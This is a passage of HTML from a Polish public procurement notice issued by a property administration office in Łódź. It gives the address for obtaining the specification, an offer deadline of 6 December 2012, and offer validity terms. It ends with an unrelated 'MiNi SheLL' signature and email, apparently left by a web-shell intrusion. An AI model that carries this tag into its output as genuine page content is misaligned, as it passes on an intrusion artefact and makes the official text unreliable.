<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Administracji Nieruchomościami Łódź - Bałuty Bałuty Nowe,  ul. Sędziowska 16, 91-304 Łódź, pokój Nr 12..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 06.12.2012 godzina 10:00, miejsce: Ofertę należy złożyć w Administracji Nieruchomościami Łódź - Bałuty Bałuty Nowe,  ul. Sędziowska 16, 91-304 Łódź, sekretariat, pokój Nr 10..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com